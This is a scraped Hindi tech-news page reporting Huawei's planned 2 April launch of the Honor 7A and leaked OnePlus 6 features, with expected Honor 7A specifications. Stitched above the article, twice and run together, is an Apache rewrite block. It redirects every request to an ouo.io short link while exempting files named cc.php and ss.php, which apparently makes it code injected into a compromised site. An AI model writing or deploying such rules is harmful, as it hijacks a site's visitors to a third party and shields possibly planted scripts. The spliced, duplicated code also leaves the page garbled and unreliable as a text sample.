
RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]
BREAKING NEWS
Total views:- 357
Previous Nextनई दिल्ली। स्मार्टफोन निर्माता कंपनी हुवावे ने बताया है कि उसका अगला बजट स्मार्टफोन अप्रेल के पहले वीक यानि की दो अप्रेल को लांच किया जाएगा। चीनी स्मार्टफोन निर्माता कंपनी ने यह भी बताया कि 2 अप्रैल को लॉन्च होने वाला फोन हॉनर 7A होगा। फोन की लुक और स्पेसिफिकेशन्स को लेकर कुछ जानकारी सामने आई है। इसी के साथ चीन की स्मार्टफोन निर्माता कंपनी वनप्लस के नए स्मार्टफोन को लेकर अफवाहों का बाजर गर्म हो गया है। फोन की फीचर्स को लेकर तमाम दावे किए जा रहे हैं। ऐसे में खबर है कि वनप्लस 6 स्मार्टफोन के फीचर्स लीक हो गए हैं। दरअसल उम्मीद की जा रही है कि वनप्लस इस साल जुन या जुलाई में अपना नया स्मार्टफोन लॉन्च कर सकता है।
हुवावे हॉनर 7A का डिजाइन हॉनर 8 की तरह फुल मेटल यूनिबॉडी होगा। फोन के सेल्फी कैमरा के साथ एलईडी फ्लैश दिया जाएगा। फोन के रियर पर कैमरा सिस्टम के साथ एलईडी फ्लैश मौजदू होगा। इसमें फेज डिटेक्शन ऑटो फोकस फीचर भी होने की उम्मीद है। इसमें ओक्टा कोर स्नैपड्रगन 430 SoC के साथ 3GB रैम और 32GB इंटरनल स्टोरेज दी जा सकती है। कैमरा की बात करें तो फोन में 13MP का रियर कैमरा होगा। इसके फ्रंट में 13MP + 2MP के ड्यूल सेंसर्स दिए जा सकते हैं। फोन को पावर देने के लिए 3000 mAh की बैटरी दी जा सकती है। फोन में फेस अनलॉक फीचर के साथ कैमरा एप में AR फीचर्स भी दिए जा सकते हैं।